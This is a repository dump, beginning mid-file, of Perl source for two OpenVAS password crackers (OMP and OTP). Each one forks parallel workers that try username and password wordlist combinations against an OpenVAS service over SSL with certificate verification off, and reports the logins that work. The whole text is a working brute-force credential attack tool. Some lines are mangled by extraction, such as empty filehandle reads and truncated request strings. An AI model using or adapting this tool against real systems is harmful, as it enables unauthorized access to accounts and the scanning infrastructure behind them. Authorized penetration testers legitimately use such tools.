$#childs) { 82 | next if ($oldpid); 83 | if ($childs[$i] eq $oldpid) { 84 | delete $childs[$i]; 85 | last; 86 | } 87 | } 88 | $total++; 89 | $pid = fork(); 90 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 91 | if ($pid) { 92 | push @childs, $pid; 93 | last if ($loop==0); 94 | } else { 95 | last;# if children skip while loop 96 | 97 | } 98 | last; 99 | } 100 | } 101 | if ($pid) {%comb = getcomb();} 102 | next; 103 | } 104 | } 105 | unless ($pid) { 106 | # children 107 | # print STDERR "Children\n"; 108 | ov_guess($comb{'user'},$comb{'pass'}); 109 | exit(0); 110 | } 111 | } 112 | 113 | $SIG{'INT'} = 'DEFAULT'; 114 | foreach (@childs) { 115 | waitpid($_, 0) 116 | } 117 | 118 | my $endtime = time(); 119 | my $difftime = $endtime - $starttime; 120 | 121 | print STDERR "\n"; 122 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 123 | print STDERR "[i] END\n"; 124 | 125 | sub getcomb { 126 | my %comb; 127 | while (1) { 128 | unless ($comb{'pass'} = ) { 129 | while (1) { 130 | unless ($comb{'user'} = ) { 131 | $comb{'nomore'} = 1; 132 | return %comb; 133 | } else { 134 | chomp($comb{'user'}); 135 | if ($comb{'user'} eq '') { 136 | next; 137 | } else { 138 | $userglob=$comb{'user'}; 139 | seek (PASS,0,0); 140 | last; 141 | } 142 | } 143 | } 144 | } else { 145 | $comb{'user'}=$userglob; 146 | chomp($comb{'pass'}); 147 | if ($comb{'pass'} eq '') { 148 | next; 149 | } else { 150 | last 151 | } 152 | } 153 | } 154 | $comb{'nomore'} = 0; 155 | return %comb; 156 | } 157 | 158 | sub ctrlc { 159 | $SIG{INT} = \&ctrlc; 160 | print "\nCTRL+C presssed, stopping.\n"; 161 | $loop=0; 162 | } 163 | 164 | sub ov_guess { 165 | my ($user, $password) = @_; 166 | my $ov_sock = IO::Socket::SSL->new( 167 | PeerAddr => $ov_host, 168 | PeerPort => $ov_port, 169 | SSL_verify_mode => 0, 170 | SSL_version => 'TLSv1', 171 | Timeout => $timeout 172 | ); 173 | if(!$ov_sock) { 174 | warn ("[w] Cannot connect to sock: $!"); 175 | return; 176 | } 177 | $ov_sock->autoflush(); 178 | 179 | #my $xmlauthreq="$user$password"; 180 | my $xmlauthreq="$user$password\r\n"; 181 | #my $xmlcommreq="\n"; 182 | 183 | #$ov_sock->print($xmlauthreq.$xmlcommreq); 184 | $ov_sock->print($xmlauthreq); 185 | #$ov_sock->print("\n"); 186 | $ov_sock->flush(); 187 | #sleep 1; 188 | #$ov_sock->print($xmlreq."\n"); 189 | my $line = $ov_sock->getline; 190 | #my $line; 191 | #while ($ov_sock->pending) { 192 | if (0) { 193 | while (length($line) == 0) { 194 | my $buff; 195 | # $ov_sock->read($buff, 1024); 196 | sysread ($ov_sock, $buff, 1024); 197 | $line=$line.$buff; 198 | # sleep 15; 199 | sleep 1; 200 | print STDERR "."; 201 | } 202 | } 203 | print STDERR "[p] $line:\n" if ($verbose>10); 204 | 205 | if(!defined($line)) { 206 | #while ($ov_sock->connected) { $line = $ov_sock->getline; print $line; } 207 | $ov_sock->close(SSL_ctx_free => 1); 208 | warn ("[w] $user:$password. Hmm. No answer. Worth checking out. Not OpenVAS Manager or TCP wrapped ?"); 209 | print $xmlauthreq."\n"; 210 | return; 211 | } 212 | 213 | unless ($ov_sock->connected) { 214 | print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0); 215 | } 216 | 217 | if($line =~ /Authentication failed/gis) { 218 | print STDERR $line."\n" if ($verbose>5); 219 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 220 | } elsif ($line =~ /1); 222 | print "[o] Success! User: $user and Password: $password\n"; 223 | } else { 224 | print STDERR $line."\n" if ($verbose>5); 225 | print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0); 226 | } 227 | 228 | $ov_sock->close(SSL_ctx_free => 1); 229 | } 230 | 231 | sub help 232 | { 233 | print "$0: OpenVAS OMP password cracker. \n"; 234 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 235 | print "Usage: $0 -i 127.0.0.1 -p 9390 -U userlist.txt -P passlist.txt\n\n"; 236 | print " -i Use target IP (default: $ov_host)\n"; 237 | print " -p

Use port

(default: $ov_port)\n"; 238 | print " -U Use user list \n"; 239 | print " -P

Use password list

\n"; 240 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 241 | print " -t use sock timeout \n"; 242 | print " -v verbose (-vv will display every combination tried)\n"; 243 | print " -h this help message\n"; 244 | exit (0); 245 | } 246 | -------------------------------------------------------------------------------- /openvas-otp-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # OpenVAS OTP password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | my $verbose = 0; 10 | my $ov_host = "localhost"; 11 | my $ov_port = "9390"; 12 | my $ov_hello = "< OTP/1.0 >\n"; 13 | my $timeout = 15; 14 | my $userfile; 15 | my $passfile; 16 | my $maxreq = 16; 17 | 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | Getopt::Long::Configure ("bundling"); 26 | 27 | my $result = GetOptions ( 28 | "i|ip=s" => \$ov_host, 29 | "p|port=i" => \$ov_port, 30 | "U|users=s" => \$userfile, 31 | "P|passwords=s" => \$passfile, 32 | "m|maxreq=i" => \$maxreq, 33 | "t|timeout=i" => \$timeout, 34 | "v|verbose+" => \$verbose, 35 | "h|help" => \&help 36 | ); 37 | 38 | unless ($userfile and $passfile) { 39 | help(); 40 | } 41 | 42 | print STDERR "OpenVAS OTP password cracker. (C) Kost. Distributed under GPL.\n\n"; 43 | 44 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 45 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 46 | 47 | my $userglob = ; 48 | chomp $userglob; 49 | 50 | $SIG{INT} = \&ctrlc; 51 | my %comb; 52 | 53 | print STDERR "[i] Cracking.\n"; 54 | my $starttime=time(); 55 | 56 | while ($loop) { 57 | if ($pid) { 58 | # print STDERR "Main/Parent\n"; 59 | %comb = getcomb(); 60 | 61 | if ($comb{'nomore'} == 1) { 62 | $loop = 0; 63 | next; 64 | } 65 | if ($ch<$maxreq) { 66 | $ch++; 67 | # print STDERR "Forking $ch\n"; 68 | $pid = fork(); 69 | die ("[e] cannot fork: $!") if (!defined($pid)); 70 | if ($pid) { 71 | push @childs, $pid; 72 | $total++; 73 | } 74 | } else { 75 | # wait for children to die 76 | while ($#childs>0) { 77 | #print STDERR "waiting to die\n"; 78 | if (my $oldpid=waitpid(-1, 0)) { 79 | # print STDERR "Oldpid: $oldpid\n"; 80 | foreach my $i (0 .. $#childs) { 81 | next if ($oldpid); 82 | if ($childs[$i] eq $oldpid) { 83 | delete $childs[$i]; 84 | last; 85 | } 86 | } 87 | $total++; 88 | $pid = fork(); 89 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 90 | if ($pid) { 91 | push @childs, $pid; 92 | last if ($loop==0); 93 | } else { 94 | last;# if children skip while loop 95 | 96 | } 97 | last; 98 | } 99 | } 100 | if ($pid) {%comb = getcomb();} 101 | next; 102 | } 103 | } 104 | unless ($pid) { 105 | # children 106 | # print STDERR "Children\n"; 107 | ov_guess($comb{'user'},$comb{'pass'}); 108 | exit(0); 109 | } 110 | } 111 | 112 | $SIG{'INT'} = 'DEFAULT'; 113 | foreach (@childs) { 114 | waitpid($_, 0) 115 | } 116 | 117 | my $endtime = time(); 118 | my $difftime = $endtime - $starttime; 119 | 120 | print STDERR "\n"; 121 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 122 | print STDERR "[i] END\n"; 123 | 124 | sub getcomb { 125 | my %comb; 126 | while (1) { 127 | unless ($comb{'pass'} = ) { 128 | while (1) { 129 | unless ($comb{'user'} = ) { 130 | $comb{'nomore'} = 1; 131 | return %comb; 132 | } else { 133 | chomp($comb{'user'}); 134 | if ($comb{'user'} eq '') { 135 | next; 136 | } else { 137 | $userglob=$comb{'user'}; 138 | seek (PASS,0,0); 139 | last; 140 | } 141 | } 142 | } 143 | } else { 144 | $comb{'user'}=$userglob; 145 | chomp($comb{'pass'}); 146 | if ($comb{'pass'} eq '') { 147 | next; 148 | } else { 149 | last 150 | } 151 | } 152 | } 153 | $comb{'nomore'} = 0; 154 | return %comb; 155 | } 156 | 157 | sub ctrlc { 158 | $SIG{INT} = \&ctrlc; 159 | print "\nCTRL+C presssed, stopping.\n"; 160 | $loop=0; 161 | } 162 | 163 | sub ov_guess { 164 | my ($user, $password) = @_; 165 | my $ov_sock = IO::Socket::SSL->new( 166 | PeerAddr => $ov_host, 167 | PeerPort => $ov_port, 168 | SSL_verify_mode => 0, 169 | Timeout => $timeout 170 | ); 171 | if(!$ov_sock) { 172 | warn ("[w] Cannot connect to sock: $!"); 173 | return; 174 | } 175 | $ov_sock->autoflush(); 176 | 177 | $ov_sock->print($ov_hello); 178 | my $line = $ov_sock->getline; 179 | 180 | if(!defined($line)) { 181 | $ov_sock->close(SSL_ctx_free => 1); 182 | warn ("[w] Hmm. No answer. Is it OpenVAS server or TCP wrapped ?"); 183 | return; 184 | } 185 | 186 | if($line eq $ov_hello) { 187 | print STDERR "[d] Handshake OK\n" if ($verbose>3); 188 | } else { 189 | $ov_sock->close(SSL_ctx_free => 1); 190 | warn ("[w] Hmm. Strange answer. Is it OpenVAS server?"); 191 | return; 192 | } 193 | 194 | print STDERR "[d] Sending login data: " if ($verbose>3); 195 | $ov_sock->print($user ."\n"); 196 | $ov_sock->print($password . "\n"); 197 | print STDERR "done!\n" if ($verbose>3); 198 | 199 | print STDERR "[d] Waiting for answer line: " if ($verbose>3); 200 | $line = $ov_sock->getline; 201 | print STDERR "done!\n" if ($verbose>3); 202 | 203 | unless ($ov_sock->connected) { 204 | print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0); 205 | } 206 | 207 | if($line =~ /Bad login/gis) { 208 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 209 | } elsif ($line =~ /SERVER <|>.*<|> SERVER/gis) { 210 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 211 | print "[o] Success! User: $user and Password: $password\n"; 212 | } else { 213 | print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0); 214 | } 215 | 216 | $ov_sock->close(SSL_ctx_free => 1); 217 | } 218 | 219 | sub help 220 | { 221 | print "$0: OpenVAS OTP password cracker. \n"; 222 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 223 | print "Usage: $0 -i 127.0.0.1 -p 9390 -U userlist.txt -P passlist.txt\n\n"; 224 | print " -i Use hostname or IP (default: $ov_host)\n"; 225 | print " -p

Use port

(default: $ov_port)\n"; 226 | print " -U Use user list \n"; 227 | print " -P

Use password list

\n"; 228 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 229 | print " -t use sock timeout \n"; 230 | print " -v verbose (-vv will display every combination tried)\n"; 231 | print " -h this help message\n"; 232 | exit (0); 233 | } 234 | --------------------------------------------------------------------------------